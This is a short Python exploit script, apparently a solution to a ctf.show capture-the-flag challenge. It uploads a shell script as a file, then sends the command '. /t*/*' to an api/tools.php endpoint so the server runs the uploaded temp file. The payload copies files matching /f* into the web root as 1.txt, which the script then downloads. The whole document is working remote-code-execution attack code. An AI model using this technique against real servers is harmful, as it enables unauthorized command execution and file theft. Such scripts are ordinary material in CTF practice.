import requests

url = "http://529caef3-02d4-43e4-b049-a6776b7e5614.challenge.ctf.show/"


def getFlag():
  file={
  "file":"#!/bin/sh\ncat /f*>/var/www/html/1.txt"
  }

  data={
    "cmd":". /t*/*"
  }
  response = requests.post(url=url+"api/tools.php",files=file,data=data)
  if "t*" in response.text:
    print("执行成功，检查回显...")
  response = requests.get(url=url+"1.txt")
  if response.status_code == 200:
    print("flag 获取成功 "+response.text)
  else:
    print("flag 获取失败")

if __name__ == '__main__':
  getFlag()

